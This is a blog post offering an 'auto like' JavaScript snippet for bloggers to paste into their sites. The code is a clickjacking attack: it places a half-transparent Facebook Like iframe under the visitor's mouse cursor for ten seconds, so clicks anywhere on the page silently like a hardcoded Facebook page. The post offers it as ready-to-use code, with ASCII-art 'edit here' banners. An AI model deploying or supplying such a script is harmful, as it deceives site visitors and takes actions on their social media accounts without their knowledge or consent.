EDITEDIT
icon icon icon
EDITEDIT EDITEDITEDITEDIT

TAB MENU

Showing posts with label Code Blogger. Show all posts
Showing posts with label Code Blogger. Show all posts

Monday, September 14, 2020

Code Auto Like

 <!--

  _____    _ _ _     _

 | ____|__| (_) |_  | |__   ___ _ __ ___

 |  _| / _` | | __| | '_ \ / _ \ '__/ _ \

 | |__| (_| | | |_  | | | |  __/ | |  __/

 |_____\__,_|_|\__| |_| |_|\___|_|  \___|


 Edit the code below using your own information.

 Happy blogging from gongshengxinyi.blogspot.com :)

-->

script type=&quot;text/javascript&quot;&gt;

  //&lt;![CDATA[

(function(){

  var Xcord = 0,

  Ycord = 0,

  IE = document.all ? true : false;

  if (!IE) document.captureEvents(Event.MOUSEMOVE);

  var lbox = document.createElement(&#39;iframe&#39;);

  lbox.src = &#39;http://www.facebook.com/plugins/like.php?href=&#39; + encodeURIComponent(/*document.location.href*/ &#39;https://www.facebook.com/changingfeeling/&#39;) + &#39;&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=53&amp;amp;action=lbox&amp;amp;colorscheme=light&amp;amp;height=30&#39;;

  lbox.scrolling = &#39;no&#39;;

  lbox.frameBorder = 0;

  lbox.allowTransparency = &#39;true&#39;;

  lbox.style.border = 0;

  lbox.style.overflow = &#39;hidden&#39;;

  lbox.style.cursor = &#39;pointer&#39;;

  lbox.style.width = &#39;53px&#39;;

  lbox.style.height =  &#39;23px&#39;;

  lbox.style.position = &#39;absolute&#39;;

  lbox.style.opacity = 0.5;

  document.getElementsByTagName(&#39;body&#39;)[0].appendChild(lbox);

  window.addEventListener(&#39;mousemove&#39;, mouseMove, false);

  setTimeout(function(){

    document.getElementsByTagName(&#39;body&#39;)[0].removeChild(lbox);

    window.removeEventListener(&#39;mousemove&#39;, mouseMove, false);

  }, 10000);

  function mouseMove(e) {

    if (IE) {

      Xcord = event.clientX + document.body.scrollLeft;

      Ycord = event.clientY + document.body.scrollTop;

    } else {

      Xcord = e.pageX;

      Ycord = e.pageY;

    }

    if (Xcord &lt; 0) Xcord = 0;

    if (Ycord &lt; 0) Ycord = 0;

    lbox.style.top = (Ycord - 8) + &#39;px&#39;;

    lbox.style.left = (Xcord - 25) + &#39;px&#39;;

    return true

  }

})();

  //]]&gt;

&lt;/script<!--

  _____    _ _ _     _

 | ____|__| (_) |_  | |__   ___ _ __ ___

 |  _| / _` | | __| | '_ \ / _ \ '__/ _ \

 | |__| (_| | | |_  | | | |  __/ | |  __/

 |_____\__,_|_|\__| |_| |_|\___|_|  \___|


 Edit the code below using your own information.

 Happy blogging from gongshengxinyi.blogspot.com :)

-->